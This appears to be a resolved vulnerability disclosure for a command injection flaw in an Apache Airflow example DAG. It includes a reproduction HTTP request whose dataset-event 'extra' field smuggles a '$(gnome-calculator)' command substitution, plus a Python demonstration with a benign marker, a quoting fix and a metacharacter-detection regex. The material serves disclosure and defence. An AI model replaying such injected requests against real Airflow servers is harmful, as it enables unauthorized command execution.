CVE-2024-45498: Apache Airflow Command injection in read_dataset_event_from_classic DAG
Low
Vulnerability Details
## Summary
A command injection vulnerability exists in the `read_dataset_event_from_classic` DAG: it executes a bash command built from the `Dataset("s3://output/1.txt")` dataset event, so an attacker with `User` privileges can inject an OS command into an event for the `s3://output/1.txt` dataset and execute arbitrary OS commands.
## Requirements
- Airflow version 2.10.0
- DAG: example_inlet_event_extra.py
- A user with `create Dataset` and `DAG trigger` permissions
## Steps to reproduce
1. Log in to an account with `User` permissions.
[screenshot attachment F3581847]
2. Inject a malicious command into the `s3://output/1.txt` dataset via the request shown below:
```http
POST /api/v1/datasets/events HTTP/1.1
Host: 192.168.168.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://192.168.168.129:8080/datasets?uri=s3%3A%2F%2Foutput%2F1.txt
Cookie: session=<authen-cookie>
Content-Type: application/json
Content-Length: 62

{"dataset_uri":"s3://output/1.txt","extra":{"hi":" '$(gnome-calculator)' "}}
```
[screenshot attachment F3581851]
[screenshot attachment F3581850]
3. Go to the `DAG` list and trigger the `read_dataset_event_from_classic` DAG.
[screenshot attachment F3581853]
4. Open the `read_dataset_event_from_classic` task log to see the output of the injected command.
[screenshot attachment F3581844]
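The mechanism behind the payload above, shown as an added example that is not Airflow's DAG code and does not depend on Airflow: a dataset event's `extra` dict is interpolated into a shell command string, and because Python renders a string that contains single quotes with double quotes, the `$(...)` lands inside a double-quoted shell word where command substitution still fires. The constructed sample event uses a benign `$(echo INJECTED)` marker instead of a real command; `render_hardened` quotes the rendered value with `shlex.quote`, and `suspicious_extra_values` is a hypothetical triage helper for flagging event payloads that carry shell metacharacters (for example when reviewing dataset-event API requests).

```python
import re
import shlex
import shutil
import subprocess

# Constructed sample event in the shape of the report's request body.
# The marker is benign: it only echoes a string if command substitution fires.
SAMPLE_EVENT = {
    "dataset_uri": "s3://output/1.txt",
    "extra": {"hi": " '$(echo INJECTED)' "},
}


def render_vulnerable(extra: dict) -> str:
    """Interpolate the dict's repr straight into the command string.

    Jinja's {{ extra }} does the same thing. repr() of a string that contains a
    single quote is emitted with double quotes, so the attacker's $(...) ends up
    inside "..." in the shell, where command substitution is still performed.
    """
    return f"echo {extra}"


def render_hardened(extra: dict) -> str:
    """Quote the rendered value so the shell treats it as a single literal word."""
    return f"echo {shlex.quote(str(extra))}"


# Characters that let a value break out of a shell word or start a substitution.
SHELL_META = re.compile(r"[`$;&|<>\n]")


def suspicious_extra_values(extra: dict) -> list:
    """Hypothetical triage helper: keys whose values contain shell metacharacters."""
    return [key for key, value in extra.items() if SHELL_META.search(str(value))]


def run_sh(cmd: str):
    """Run a command through /bin/sh and return its stdout, or None if no sh is available."""
    if shutil.which("sh") is None:
        return None
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


if __name__ == "__main__":
    extra = SAMPLE_EVENT["extra"]
    print("vulnerable command:", render_vulnerable(extra))
    print("vulnerable output: ", run_sh(render_vulnerable(extra)))
    print("hardened command:  ", render_hardened(extra))
    print("hardened output:   ", run_sh(render_hardened(extra)))
    print("flagged keys:      ", suspicious_extra_values(extra))
```

Running the block prints `INJECTED` for the vulnerable rendering (the substitution ran) and the literal `$(echo INJECTED)` text for the hardened one. Quoting the value is the minimal fix for a templated `bash_command`; passing untrusted data through an environment variable or processing it in Python instead of a shell removes the shell from the path entirely.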
## Impact
Execution of arbitrary OS commands.
Report Stats
- Report ID: 2705661
- State: Closed
- Substate: resolved
- Upvotes: 1